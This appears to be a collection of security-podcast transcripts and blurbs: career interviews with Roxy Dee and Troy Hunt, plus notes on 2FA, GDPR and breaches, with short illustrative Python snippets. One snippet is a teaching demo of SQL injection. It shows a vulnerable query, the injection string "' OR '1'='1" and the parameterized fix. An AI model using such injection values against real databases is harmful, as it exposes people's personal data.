Cindy Ng: We currently have a huge security shortage, and people are making analogies as to the kind of people we should hire. For instance, if you're able to pick up music, you might be able to pick up technology. And I've found that in security it's extremely important to be detail oriented, because the adage is the bad guys only need to be right once and security people need to be right all the time. And I had read on your Medium account the way you got into security, for practical reasons. And so let's start there, because it might help encourage others to start learning about security on their own. Tell us what aspect of security you found interesting and the circumstances that led you in this direction.
Roxy Dee: Just to comment on what you've said: actually, that's a really good reason to make sure you have a diverse team, because everybody has their own special strengths, and having a diverse team means that you'll be able to fight the bad guys a lot better, because there will always be someone who has that strength where it's needed. The bad guys can develop their own team the way they want, and so it's important to have a diverse team because every bad guy you meet is going to be different. That's a very good point in itself.
Cindy Ng: Can you clarify "diverse?" You mean everybody on your team is going to have their own specialty that they're really passionate about? By knowing what they're passionate about, you know how to leverage their skill set? Is that what you mean by diversity?
Roxy Dee: Yeah. That's part of it. I mean, just making sure that you don't have the same kind of person everywhere. For example, I'll tell my story like you asked in the original question. As a single mom, I have a different experience than someone that has had fewer difficulties in that area, so I might think of things differently, or be resourceful in different ways. Or I'm not really that great at writing reports. I can write well, but I haven't had the practice of writing reports. Somebody that went to college might have that because they were kind of forced to do it. So you gain a lot by having people from different backgrounds that have had different struggles.
And I got into security because I was already into phone phreaking, which is a way of hacking the phone system. And so for me, when I went to my first 2600 Meeting and they were talking about computer security and information security, it was a new topic and I was kind of surprised. I was like, "I thought 2600 was just about phone hacking." But I realized that at the time...It was 2011, and phone hacking had become less of a thing and computer security became more of something. I got the inspiration to go that route, because I realized that it's very similar. But as a single mom, I didn't have the time or the money to go to college and study for it. So I used a lot of self-learning techniques, I went to a lot of conferences, I surrounded myself with people that were interested in the topic, and through that I was able to learn what I needed to do to start my career.
Cindy Ng: People have trouble learning the vocabulary because it's like learning a new language. How did you...even though you were into phone hacking and the transition into computer security, it has its own distinct language, how did you make the connections and how long did it take you? What experiences did you surround yourself with to cultivate a security mindset?
Roxy Dee: I've been on computers since I was a little kid, like four or five years old. So for me, it may not have been as difficult as for other people, because I kind of grew up on computers. Having that background helped. But when it came to information security, there were a lot of times where I had no idea what people were saying. Like, I did not know what "reverse engineering" meant, or I didn't know what "Trojan" meant. And now, it's like, "Oh, I obviously know what those things are." But I had no idea what people were talking about. So going to conferences and watching DEF CON talks, and listening to people. But by the time I had gone to DEF CON about three times, I think it was my third time I went to DEF CON, I thought, "Wow. I actually know what people are saying now." And it's just a gradual process, because I didn't have that formal education.
There were a few conferences that I volunteered at. Mostly at BSides. And BSides are usually free anyway. When you volunteer, you become more visible in the community, and so people will come to you or people will trust you with things. And that was a big part of my career, was networking with people and becoming visible in the community. That way, if I wanted to apply for a job, if I already knew someone there or if I knew someone that knew someone, it was a lot easier to get my resume pushed to the hiring manager than if I just apply.
Cindy Ng: How were you able to land your first security job?
Roxy Dee: And as far as my first infosec job, I was working in tech support and I was doing very well at it. I was at the top of the metrics; I was always in, like, the top 10 agents.
Cindy Ng: What were some of the things that you were doing?
Roxy Dee: It was tech support for Verizon Fios. There was a lot of, "Restart your router," "Restart your set-top box," things like that. But I was able to learn how to explain things to people in ways that they could understand. So it really helped me understand tech speak, I guess, understand how to speak technically without losing the person, like a non-technical person.
Cindy Ng: And then how did you transition into your next role?
Roxy Dee: It all had to do with networking, and at this point, I had volunteered for a few BSides. So actually, someone that I knew at the time told me about a position that was an entry-level network security analyst role, and all I needed to do was get my Security+ certification within the first six months of working there. And so it was an opportunity for me because they accepted entry-level people. And when they gave me the assessment that they give people they interview, I aced it, because I had already studied networking through a website called "Professor Messer." And that website actually helped me with Security+ as well, and I was able to do that through YouTube videos; his entire website is just YouTube videos. So once I got there, I took my Security+ and I ended up, actually, on the night shift. So I was able to study in quiet during my shift every day at work. I just made it a routine: I had to spend a certain amount of time studying on whatever topic I wanted to move forward with, and I knew what to study because I was going to conferences and taking notes from the talks, writing down things I didn't understand or words I didn't know, and then later I would research that topic so I could understand more. And then I would watch the talk again with that understanding, if it was recorded, or I would go back to my notes with that understanding. The fact that I was working overnight and was not interrupted really helped. And that was like a very entry-level position. From there, I went to a cloud hosting company, a secure cloud hosting company with a focus on security, and the great thing about that was that it was a startup. They didn't have a huge staff, and they had a ton of things that they had to do and a bunch of unrealistic deadlines. So they would constantly be throwing me into situations I was not prepared for.
Cindy Ng: Can you give us an example?
Roxy Dee: Yeah. That was really like the best training for me, is just being able to do it. So when they started a Vulnerability Management Program, I have no experience in vulnerability management before this and they wanted me to be one of the two people on the team. So I had a manager, and then I was the only other person. Through this position, I learned what good techniques are and I was also inspired to do more research on it. And if I hadn't been given that position, I wouldn't have been inspired to look it up.
Cindy Ng: What does Vulnerability Management entail, three things that you should know?
Roxy Dee: Yeah. So Vulnerability Management has a lot to do with making sure that all the systems are up to date on patching. That's one of them. The second thing I would say that's very important is inventory management, because there were some systems that nobody was using and vulnerabilities existed there, but there was actually no one to fix them. And so if you don't take proper inventory of your systems and you don't do, you know, discovery scans to discover what's out there, you could have something sitting there that an attacker, once they get in, could use or might have access to. And then another thing that's really important in Vulnerability Management is actually managing the data, because you'll get a lot of data. But if you don't use it properly, it's pretty much useless, if you don't have a system to track when you need to have this remediated by and what your compliance requirements are. And so you have to track, "When did I discover this and when is it due? What are the vulnerabilities and what are the systems? What do the systems look like?" So there's a lot of data you're going to get and you have to manage it, or you will be completely unable to use it.
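As a minimal sketch of the data-management point Dee makes here, the snippet below tracks each finding with its discovery date and derives a remediation due date from severity. The SLA windows, hosts, and CVEs are hypothetical examples, not her team's actual policy.

```python
# Toy vulnerability-tracking sketch: every finding carries its discovery date
# and a due date derived from severity. SLA windows below are assumed values.
from dataclasses import dataclass
from datetime import date, timedelta

SLA_DAYS = {"critical": 15, "high": 30, "medium": 60, "low": 90}  # hypothetical policy

@dataclass
class Finding:
    host: str
    cve: str
    severity: str
    discovered: date

    @property
    def due(self) -> date:
        return self.discovered + timedelta(days=SLA_DAYS[self.severity])

    def overdue(self, today: date) -> bool:
        return today > self.due

findings = [
    Finding("web01", "CVE-2017-0144", "critical", date(2017, 6, 1)),   # example entries
    Finding("db02", "CVE-2016-2183", "medium", date(2017, 5, 20)),
]

today = date(2017, 7, 1)
for f in findings:
    status = "OVERDUE" if f.overdue(today) else f"due {f.due}"
    print(f"{f.host} {f.cve} ({f.severity}): {status}")
```

In practice this lives inside a scanner or ticketing system, but the idea is the same: every finding carries its dates, so the pile of scan data stays usable.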
Cindy Ng: And then you moved on into something else?
Roxy Dee: Oh, yes. Actually, it being a startup kind of wore on me, to be honest. So I got a phone call from a recruiter, actually, while I was at work.
This was another situation where I had no idea how to do what I was tasked with, and the task was...So from my previous positions, I had learned how to monitor and detect, and how to set up alerts, useful alerts that can serve, you know, whatever purpose was needed. So I already had this background. So they said, "We have this application. We want you to log into it, and do whatever you need to do to detect fraud." Like it was very loosely defined what my role was, "Detect bad things happening on the website." So I find out that this application actually had been stood up four years prior and they kind of used it for a little while, but then they abandoned it.
And so my job was to bring it back to life and fix some of the issues that they didn't have time for, or they didn't actually know how to fix or didn't want to spend time fixing them. That was extremely beneficial. I had been given a task, so I was motivated to learn this application and how to use it, and I didn't know anything about fraud. So I spent a lot of time with the Fraud Operations team, and through that, through that experience of being given a task and having to do it, and not knowing anything about it, I learned a lot about fraud.
Cindy Ng: I'd love to hear from your experience what you've learned about fraud that most people might not know.
Roxy Dee: What I didn't consider was that, actually, fraud detection is very much like network traffic detection. You look for a type of activity or a type of behavior and you set up detection for it, and then you make sure that you don't have too many false positives. And it's very similar to what network security analysts do. And when I hear security people say, "Oh, I don't even know where to start with fraud," well, just think about from a network security perspective if you're a network security analyst, how you would go about detecting and alerting. And the other aspect of it is the fraudulent activity is almost always an anomaly. It's almost always something that is not normal. If you're just looking around for things that are off or not normal, you're going to find the fraud.
Cindy Ng: But how can you can tell what's normal and what's not normal?
Roxy Dee: Well, first, it's good to look up all sorts of sessions and all sorts of activity and get like a baseline of, you know, "This is normal activity." But you can also talk to the Fraud team or, you know, or whatever team handles...It's not specific to fraud, but, you know, if you're detecting something else, talk to the people that handle it. And ask them, "What would make your alerts better? What is something that has not been found before or something that you were alerted to, but it was too late?" And ask just a bunch of questions, and then you'll find through asking that what you need to detect.
Like for example, there was one situation where we had a rule that if a certain amount was sent in a certain way, like a wire, that it would alert. But what we didn't consider was, "What if there's smaller amounts that add up to a large amount?" And understanding...So we found out that, "Oh, this amount was sent out, but it was sent out in small pieces over a certain amount of time." So through talking to the Fraud Operations team, if we didn't discuss it with them, we never would have known that that was something that was an issue. So then we came up with a way to detect those types of fraudulent wire transfers as well.
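The structuring scenario Dee describes, many small wires adding up to a large amount, maps naturally onto a rolling-window aggregation. The sketch below is a hypothetical illustration of that kind of detection rule; the threshold, window, and account are invented, not the bank's actual logic.

```python
# Toy structuring detector: sum each account's wires over a rolling window
# and alert when the total crosses the threshold. All values are examples.
from collections import defaultdict
from datetime import datetime, timedelta

THRESHOLD = 10_000          # assumed alerting threshold, in dollars
WINDOW = timedelta(days=7)  # assumed look-back window

def rolling_alerts(transfers):
    """transfers: iterable of (account, timestamp, amount), in any order."""
    by_account = defaultdict(list)
    for account, ts, amount in transfers:
        by_account[account].append((ts, amount))

    alerts = []
    for account, events in by_account.items():
        events.sort()
        window, total = [], 0.0
        for ts, amount in events:
            window.append((ts, amount))
            total += amount
            # drop events that fell out of the look-back window
            while window and ts - window[0][0] > WINDOW:
                total -= window[0][1]
                window.pop(0)
            if total >= THRESHOLD:
                alerts.append((account, ts, total))
    return alerts

transfers = [
    ("acct-42", datetime(2017, 3, 1), 4_000),
    ("acct-42", datetime(2017, 3, 3), 3_500),
    ("acct-42", datetime(2017, 3, 5), 3_000),   # cumulative 10,500 within 7 days
]
print(rolling_alerts(transfers))
```

The same pattern, baseline plus aggregate-and-compare, is what she means when she says fraud detection works a lot like network traffic detection.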
Cindy Ng: How interesting. Okay. You were talking about your latest role at another bank.
Roxy Dee: I finished my contract and then I went to my current role, which focuses on a lot more than just online activity. I have more to work with now. With each new position, I just kind of layered more experience on top of what I already knew. And I know it's better to work for a company for a long time and I kind of wish these past six years, I had been with just one company.
Each time that I changed positions, I got more responsibility, pay increase, and I'm hoping I don't have to change positions as much. But it kind of gave me like a new environment to work with and kind of forced me to learn new things. So I would say, in the beginning of your career, don't settle. If you get somewhere and you don't like what you're being paid, and you don't think your career is advancing, don't be afraid to move to a different position, because it's a lot harder to ask for a raise than to just go somewhere else that's going to pay you more.
So I'm noticing a lot of the companies that I'm working for, will expect the employees to stay there without giving them any sort of incentive to stay. And so when a new company comes along, they say, you know, "Wow. She's working on this and that, and she's making x amount. And we can take all that knowledge that she learned over there, and we can basically buy it for $10,000 more than what she's making currently." So companies are interested in grabbing people from other companies that have already had the experience, because it's kind of a savings in training costs. So, you know, I try to look every six months or so, just to make sure there's not a better deal out there, because they do exist. And I don't know how that is in other fields, though. I know in information security, we have that. That's just the nature of the field right now.
Cindy Ng: I think I got a good overview of your career trajectory. I'm wondering if there's anything else that you'd want to share with our listeners?
Roxy Dee: Yeah. I guess, I pretty much have spent...So the first two or three years, I spent really working on myself, and making sure that I had all the knowledge and resources I needed to get that first job. The person that I was five or six years ago is different than who I am now. And what I mean is, my situation has changed a bit, to where I have more income and I have more capabilities than I did five years ago. One of the things that's been important to me is giving back and making sure that, you know, just because I went through struggles five years ago...You know, I understand we all have to go through our struggles. But if I can make something a little bit easier for someone that was in my situation or maybe in a different situation but still needs help, that's my way of giving back.
And spending $20 to buy someone a book is a lot less of a hit on me financially than it would have been five years ago. Five years ago, I couldn't afford to drop even $20 on a book to learn. I had to do everything online, and everything had to be free. I just want to encourage people: if you see an opportunity to help someone, for example, if you see someone that wants to speak at a conference and they just don't have the resources to do so, and you think, "Well, this $100-a-night hotel room is less of a financial hit to me than to that person, and that could mean the difference between them having a career-building opportunity or not having it," just seek out ways to help people. One of the things I've been doing is the free book giveaway, where I actually have people sending me Amazon gift cards, and there is actually one person that's done it consistently in large amounts. And what I do with that is, like every two weeks, I have a tweet that I send out, and if you reply to it with the book that you want, then you can win that book, up until I run out of money, up until I run out of Amazon dollars.
Cindy Ng: Is this person an anonymous patron or benefactor? This person just sends you an Amazon gift card...with a few bucks and you share it with everyone? That's so great.
Roxy Dee: And other people have sent me, you know, $20 to $50 in Amazon credits, and it's just a really good...It kind of happened accidentally, and there's the story of it on my Medium account.
Cindy Ng: What were the last three books that you gave away?
Roxy Dee: Oh, the last three? Well...
Cindy Ng: Or the last one, if you...
Roxy Dee: ...the most popular one right now, this is just based on the last one that I did, is the Defensive Security Handbook. That was the most popular one. But I also get a lot of requests for Practical Packet Analysis by Chris Sanders and Practical Malware Analysis. And so this one, actually, this is a very recent book that came out called the Defensive Security Handbook. That's by Amanda Berlin and Lee Brotherston. And that's about...it says, "Best practices for securing infrastructure." So it's a blue team-themed book. That's actually sold over 1,000 copies already and it just came out recently. It came out about a month ago. Yeah. So I think that's going to be a very popular book for my giveaways.
Cindy Ng: How are you growing yourself these days?
Roxy Dee: Well, I wanted to spend more time writing guides. I just want to write things that can help beginners. I have set up my Medium account, and I posted something on setting up a honeypot network, which is a very...it sounds very complicated, but I broke it down step by step. So my goal in this was to make one article where you could set it up. Because a lot of the issues I was having was, yeah, I might find a guide on how to do something, but it didn't include every single step. Like they assumed that you knew certain things before you started on that guide. So I want to write things that are easy for people to follow without having to go look up other sources. Or if they do have to look up another source, I have it listed right there. I want to make things that are not assuming that there's already prior knowledge.
Cindy Ng: Thank you so much for sharing with me, with our listeners.
Roxy Dee: Thank you for letting me tell my story, and I hope that it's helpful to people. I hope that people get some sort of inspiration, because I had a lot of struggles and, you know, there's plenty of times I could have quit. And I just want to let people know that there are other ways of doing things and you don't have to do something a certain way. You can do it the way that works for you.
We’re counting down to Black Hat USA, where we'll attend one of the world’s leading information security conferences to learn about the latest research, developments, and trends.
We’ll also be at booth #965 handing out fabulous fidget spinners and showcasing all of our solutions that will help you protect your data from insider threats and cyberattacks.
In this podcast episode, we discuss sessions you should attend as well as questions to ask that will help you reduce risk. We even cover why it isn't wise to rely only on important research methods like honeypots to save you from insider threats or other attacks.
Panelists: Cindy Ng, Kris Keyser, Kilian Englert, Mike Buckbee
Finally, after years of advocacy, many popular web services have adopted two-factor authentication (2FA) as a default security measure. Unfortunately, as you might suspect, attackers have figured out workarounds. For instance, attackers can intercept your PIN in a password-reset man-in-the-middle attack.
So what should we do now? As the industry moves beyond 2FA, the good news is that three-factor authentication is not on the shortlist as a replacement. Google’s identity systems manager, Mark Risher said, “One of the truths we’ve found is that people won’t accept more security than they think they need.”
There have been talks about using biometrics as a promising form of authentication. In the meantime, know that using 2FA is more secure than using just a password.
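For readers curious what a 2FA one-time code actually is, here is a minimal TOTP sketch along the lines of RFC 6238; the secret shown is a throwaway example, and real services add rate limiting and other protections. It also shows why an intercepted or phished code is only useful briefly: the value rolls over every 30 seconds.

```python
# A minimal time-based one-time password (TOTP) sketch, RFC 6238 style.
# The base32 secret below is a throwaway example value, not a real credential.
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval          # current 30-second time step
    msg = struct.pack(">Q", counter)                # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # proves possession of the secret, not just a password
```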
Right now, many companies are planning 2018’s budget. As always, it is a challenge to secure enough funds to help with IT’s growing responsibilities. Whether you’re a nonprofit, small startup or a large enterprise, you’ll be asked to stretch every dollar. In this week’s podcast, we discussed the challenges a young sysadmin volunteer might face when tasked with setting up the IT infrastructure for a nonprofit.
And for a budget interlude, I asked the panelists about the growing suggestion for engineers to take philosophy classes to help with ethics related questions.
Panelists: Cindy Ng, Kilian Englert, Mike Thompson, Mike Buckbee
When it comes to infosecurity, we often equate data with money. And rightfully so. After all, data is valuable. Not to mention the human hours devoted to safeguarding an organization’s data.
However, when a well-orchestrated attack sets out to destroy an organization’s data rather than to profit financially from it, we wondered whether data is really worth more than money.
Sure you can quantify the cost of tools, equipment, hours spent protecting data, but what about intellectual and emotional labor? How do we assign proper value to the creative essence and spirit of what makes our data valuable?
It’s been reported that 85% of businesses are in the dark about their data. This means that they are unsure what types of data they have, where it resides, who has access to it, who owns it, or how to derive business value from it. Why is this a problem? First, the consumer data regulation, the GDPR, is just a year away, and if you’re in the dark about your organization’s data, meeting this regulation will be a challenge. If your organization is outside the EU but processes EU citizens’ personal data, the GDPR rules will still apply to you.
Second, when you encounter attacks such as ransomware, it’s a bit of a mess to clean up. You’ll have to figure out which users were infected, if anything else got encrypted, when the attack started, and how to prevent it from happening in the future.
However, what’s worse than a ransomware attack are attacks that don’t notify you, like insider threats! These threats don’t present you with a ransomware-like pop-up window that tells you you’ve been hacked.
It’s probably better to be the company that got scared into implementing some internal controls, rather than the one that didn’t bother and then went out of business because all its customer data and trade secrets ended up in the public domain.
In short, it just makes good business and security sense to know where your data resides.
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
The short answer is: if your organization stores, processes, or shares EU citizens’ personal data, GDPR rules will apply to you.
In a recent survey, 94% of large American companies said they possess EU customer data that will fall under the regulation, yet only 60% of respondents have plans in place to respond to the impact the GDPR will have on how they handle customer data.
Yes, GDPR isn’t light reading, but in this podcast we’ve found a way to simplify the GDPR’s key requirements so that you’ll get a high level sense of what you’ll need to do to become compliant.
We also discuss the promise and challenges of what GDPR can bring – changes to how consumers relate to data as well as how IT will manage consumer data.
After the podcast, you might want to check out the free 7-part video course we developed with Troy Hunt on the new European General Data Protection Regulation that will tell you: What are the requirements? Who will be affected? How does this help protect personal data?
Troy Hunt is a web security guru, Microsoft Regional Director, and author whose security work has appeared in Forbes, Time Magazine and Mashable. He’s also the creator of “Have I been pwned?”, the free online service for breach monitoring and notifications.
In this podcast, we discuss the challenges of the industry, learn about his perspective on privacy and revisit his talk from RSA, Lessons from a Billion Breached Data Records as well as a more recent talk, The Responsibility of Disclosure: Playing Nice and Staying Out of Prison.
After the podcast, you might want to check out the free 7-part video course we developed with Troy on the new European General Data Protection Regulation that will be law on May 25, 2018 - changing the landscape of regulated data protection law and the way that companies collect personal data. Pro tip: GDPR will also impact companies outside the EU.
Cindy Ng: I'd like to try to capture on a podcast things that we can't do in writing or in a visual format, and I think there's an emotional aspect to audio. It really helps people get to know more of who you are.
Troy Hunt: You know, those were the exact words that just came to mind as you were saying it because there's a lot of feeling and sentiment that gets lost when you just throw things out, isn't there?
Cindy Ng: Mm-hmm. Definitely. And you have a site, Have I Been Pwned, that notifies people when there's a data breach. And I was listening to the recording that you did at RSA, "Lessons from a Billion Breached Records." I thought it was really interesting that you were making the case that the hackers are kids, 18, 19, 20 years old, and that you end up mediating conversations with them. Do you talk to their parents?
Troy Hunt: No, I just tell them to go to their room and think about what they've done. And we...no, I can't do that. I feel like doing that at times because you get the sense, and to be clear, when we say, "talk," it is all text, right? This is not what you and I are doing. And to the earlier point, that, yeah, this doesn't sort of convey emotion and sentiment and maturity in the same way as a voice discussion does. This is all sort of text-based chat. And you sort of get the impression from the style of chat, the words that are used, the references that are made, you build up this mental image of who you're talking to, right? And time and time again, it's like this is a young male, it's either legally a child, you know, normally 15, 16, 17, or very young adult, maybe sort of early 20s at the eldest. And time and time again, we see that that plays out to be the case. And particularly when we look at historical incidents of the likes of "hacktivists" being arrested and charged and that's a little bit of a liberally-used term, I suspect, hacktivist. Very often when we see people that have been breaking into systems and causing havoc for not necessarily for sort of monetary gain or personal advancement, but just because it was there, just for the lulz. We see this pattern time and time again. Look, I mean, certainly, at that age, people are independent enough that I'm not going to end up in conversations with their parents. That would be condescending for me to go, "Hey, is your mom or dad there?" You know, "Can I have a chat to them?" So, we don't normally end up in that direction.
Cindy Ng: It's just funny that you're engaging with them in a very human way to verify a breach or in the process of.
Troy Hunt: You know, they are human.
Cindy Ng: Well, we really don't know what hackers look like. We have a certain kind of image of them.
Troy Hunt: Well, I mean, yes and no. So we have put faces to them insofar as we have seen many previous incidents where we've seen these people, this, you know, class of person, charged and turn up publicly. I mean, some of very sort of high-profile ones have been the likes of some of the individuals from the LulzSec hacktivist group that were very active around 2011. So we know of people like Jake Davis who was about 18 at the time who was charged. We know it's Jake because he was up there in the news as a sort of a high-profile catch, if you like, for the authorities. And we've also seen him and others as well in that group actually go on to do some really cool stuff in very productive ways. So, you know, I guess there is this part of us which knows in an evidence-based way who these individuals tend to be and the demographic they fit into. And then the point I make, particularly in the introduction of that talk about the billions of breached records, is that there's this other side which is how hackers are portrayed online. Look, I mean, there's lots of recordings of this talk, "Lessons from Billions of Breached Records," that people can go and have a look at and see what I show, but when you go to, say, Google Images Search, and you search for "hacker," it's like hoodies and green screens and binary and stuff everywhere. And it's all scary imagery. And we've got probably the media to blame for a lot of that, we've got security companies to blame for a lot of that, because they like to make this stuff scary because the more scared you are, the more security stuff you buy. So we get this sort of portrayal which is very out of step with the individuals themselves. Now, part of that as well is blown up by those individuals, whilst they are anonymous, and they're feeling invincible, and they feel that they sort of, you know, rule the world. Having a lot of sort of bravado in the way they present themselves, the way they talk. If we have a look at when we see things like attacks where data is held for ransom and we see individuals asking for money. The language they use, and the way they conduct themselves seems enormously confident, they feel infallible, they sound kind of scary. And we sort of see these three aspects, so the way they present themselves, the way the media categorizes them, and then who they actually are once they're unveiled, and those three stories tend to actually be quite different.
Cindy Ng: And do they work with others, say, if you get an encounter with ransomware, and you go to their site and there's tech support, customer support, are those people working independently, and are they 18 years old?
Troy Hunt: You know, the way I like to explain it, and certainly, it's not just me, I see other people use these categories as well, is, there are sort of three particular demographics that we regularly see time and time again. And one demographic is this class of individual that I've just been discussing, which is sort of your hacktivist, your individual who's out there in pursuit of a greater cause, very often just bored kids with time on their hands. And, you know, they're dangerous because they're bored kids. Bored kids can be pretty dangerous. But they're not necessarily overly sophisticated, their attention spans can be a little short on the target, if there's not something fun and easy there, and then they move on.
There is this other category of attacker which is those that are actually out there for commercial gain, so those that have an ROI. And these are the sort of the career criminals. And, you know, this is a really interesting group, and it speaks more to the ransomware-style class of attacker where they are out there to try and make money. Now, very often, your hacktivist is out there because something was there or it was fun, it was, again, for the lulz. But these guys are saying, "Look, we've actually got an ROI here. We're going to invest in vulnerabilities, we're going to invest in exploits, we're going to invest in botnets. We'll spend money where it makes sense to make money. We will target organizations with the expectation of getting a return." They're not necessarily out there to get press and media, they're out there to make money. And something like ransomware is a really good example there. They'll indiscriminately target anyone that can be infected. So I shouldn't laugh, but I was actually in a dentist's just two days ago and whilst I was there they were busily discovering that they had ransomware. And, oh, man, watching that unfold. But inevitably, there's someone behind that who's out there to make money. And that's sort of the second category and I suspect we'll spend a bit more time there, and then in this third category we speak about state actors and sort of nation state hackers, which, of course, is also becoming a very big thing these days.
Cindy Ng: Well, I'd like to tie it into a future event that you'll be presenting. I think it's called "Playing Nice and Staying Out of Prison." And I want to hear more about that event because it reminds me of these investment bankers who got caught doing insider trading, and they said that everyone inside the community was doing it and making money. And then the FBI reminded these bankers that, just because you disagree with a law, it does not mean you can break it. And so I feel like we are treading in these interesting territories where you're sitting in front of a computer. You don't necessarily have to be in a suit, but it's still considered like a white-collar crime? Is this something that you're presenting on, or?
Troy Hunt: No, look, you're pretty much right there. In fact, the talk I'm doing, it's at the AusCERT Conference in Australia. And it's the only conference I go to that I can walk to, which I'm very happy about. Because normally I've got to get on airplanes. But this talk is called "The Responsibility of Disclosure, Playing Nice and Staying Out of Prison." And it's actually a talk that AusCERT asked me to do. So AusCERT is a national computer emergency response team, it's an organization that provides services to companies in Australia to help them deal with things like security incidents. And in fact, I worked with them quite a bit last year when the Red Cross blood bank service inadvertently published their database backups publicly. So I've had quite a bit to do with them, and they really wanted me to talk about, how do we do responsible disclosure in a responsible fashion? So I talk a lot about the way individuals need to go about their responsible disclosure, and I've got an example here, I'll give everyone a highlight before I talk about it. I got an email the other day from a guy, and the guy says, "I'm a fledgling IT professional that likes to delve into web development and security." It's like, "Oh, that's very nice, thank you for emailing me." And then he goes on and he says, "I recently discovered a bug in an American company's website which reveals the names, birthdates, email addresses, physical addresses, and phone numbers of their customers." And you're sort of going, "Okay, well, that's bad, but he's discovered it," so now he's at this crossroads where he can do the right thing and get in touch with the organization or he can go down various shades of gray and do the wrong thing. And the next thing he says is, he says, "This may have been dumb," that turns out to be a very insightful comment, "But I wrote a script to grab the first 10,000 records to confirm the exploit is what I thought it was." And this is a really good example of where the guy could have grabbed the first one record and said, "Hey, look at this, I can see someone else's record, now I'm going to get in touch with the company and let them know." And they would've gone, "Okay, well, look, he's gone far enough to see one record." And let's say they did want to get all legal, and he's gotta stand there in front of the judge and go, "Look, mate, I saw one record, I reported it, I handled it ethically." But instead, he's gone and grabbed 10,000 records of other people's personal data. And as soon as you go down that road, now you've got a big problem. Because the entity involved is going to be accountable or certainly is going to be held accountable for contacting those 10,000 people and saying, "Hey, someone else grabbed your data." And that's going to invoke all sorts of other legal obligations on their behalf as well. So even though I don't think this individual had malicious intent, obviously he went way, way, way beyond what he actually needed to. And it's just interesting how...and, you know, look, maybe the script took him 20 minutes to write, but it's interesting how there's just these continual crossroads where it's so easy to do the right thing, but it's also so easy to put yourself in serious risk of legal action.
Cindy Ng: We've talked a couple of times on our podcast about having maybe a technologist Hippocratic Oath, in the same way that doctors might take an oath. And also about a possible problem with the law not necessarily having caught up with how fast technology is changing. Is there something that you've seen that's helpful for people? Because it's complicated.
Troy Hunt: I think the analogies that try to compare what we do in this industry with other industries often don't fly real well. Say we want to sort of compare ourselves to doctors: look, when you've got 15-year-old kids at home doing heart surgery on an ad hoc basis, well, then, you know, then we can make comparisons. But it is very different, because to be a doctor you've got, you know, years and years and years of training, you've got to have qualifications, there's enormous amounts of oversight and regulation and everything else. And by the time you're actually out there practicing as a doctor and doing things that impact people's health, obviously, we have a huge amount of confidence that these are going to be people doing the right thing who are, you know, properly experienced.
Now, when we compare that to... I mean, let's look broader than just security, let's look at IT. When you compare that to what do you have to do to get involved in IT, read a book? You know, like, very, very little. And that's kind of a...what both makes it great and makes it horrifying. Where we can have people out there building systems, leaving people at risk, or conversely, people out there that have got enough capability to find vulnerabilities, but maybe not quite enough in the sort of ethics front to handle them properly.
I don't think anything around the sort of IT Hippocratic Oath or anything around IT certifications that everyone should have is ever going to be a feasible thing.
Cindy Ng: I don't know, I'm thinking, too, though, that it takes years and years to figure out how to build a layered security system, for instance, and it takes a lot of manpower.
Troy Hunt: Yeah. Yeah. Yes and no. Yeah, part of the challenge here is that we operate on such a global scale as the internet. And one of the things that organizations and the industry is always concerned about is that if we’re overly burden... I mean, let's say...in the U.S. we've said, "Okay, anyone who's going to produce software that runs on the internet has to go and do X, Y, Z certifications." And then they become burdened to do that, regardless of what the upside is, there's a time and a financial cost to do it. And then, someone goes, "Well, we could offshore it to India, and they don't have to do that, it'd be a lot cheaper." You know, so unless you get consensus on a global scale, because we are talking about a global resource, being the internet, it's just not going to happen. So it is a complex problem but, you know, by the same token as well, when we look at...and we're probably sort of talking more about the defensive side here than the offensive, but when we look at where most software goes wrong, in terms of the vulnerabilities, and certainly when I look at the data breaches that I see day in and day out, these are really low-hanging risks that one person could have secured very easily if they just didn't write that code that was vulnerable to SQL injection or if they just didn't put their database backup in a publicly-facing location. It's very often very low-hanging fruit in terms of the problems that are introduced, and consequently, they're problems that could be easily fixed.
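To make that low-hanging fruit concrete, here is a minimal Python sketch (ours, not Troy's, with a made-up users table) contrasting a query that is open to SQL injection with the parameterized version that closes it off:

    import sqlite3

    # Vulnerable: the email value is pasted into the SQL text, so input like
    # "' OR '1'='1" rewrites the query and returns every row.
    def find_user_unsafe(conn, email):
        return conn.execute(
            "SELECT id, email FROM users WHERE email = '" + email + "'"
        ).fetchall()

    # Fixed: the value is bound as a parameter and can never become SQL.
    def find_user_safe(conn, email):
        return conn.execute(
            "SELECT id, email FROM users WHERE email = ?", (email,)
        ).fetchall()

    if __name__ == "__main__":
        conn = sqlite3.connect(":memory:")
        conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
        conn.execute("INSERT INTO users (email) VALUES ('alice@example.com')")
        print(find_user_unsafe(conn, "' OR '1'='1"))  # leaks the whole table
        print(find_user_safe(conn, "' OR '1'='1"))    # returns nothing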
Cindy Ng: Is that part of your "Hacking Yourself" course, which remains one of your most popular courses?
Troy Hunt: No, you're right, and the premise of hacking yourself first is that it's very much targeted at people building systems, and it's saying, "Hey, guys, it would be really good if you actually understood how things like SQL injection work." So not just, you know, do you understand how T-SQL works and how you query a database, but do you understand how people break into the software that you're writing?
So I have an online course with Pluralsight, it's, I think, about 9 or 10 hours' worth of content on "Hack Yourself First" and I also do these workshops around the world where I sit with developers for a couple of days and we go through all of these aspects of building software and where the vulnerabilities are. And developers get this sort of first-hand experience of breaking their own things. And it's amazing to watch the lightbulbs go on in people's minds as they see how their beautiful software gets abused in all sorts of ways they never expected. And by hacking themselves first, that gives them this much more sort of defensive mindset. And as well as having a lot of fun doing it, developers do actually like breaking stuff. It also means that when they go forward and they build new software, that they're thinking with a much more defensive mindset than what they ever had before.
Cindy Ng: When you say, "lightbulbs go off," what are some common things that they go, "Oh, I never really thought about it that way," or, "This really changed my worldview?"
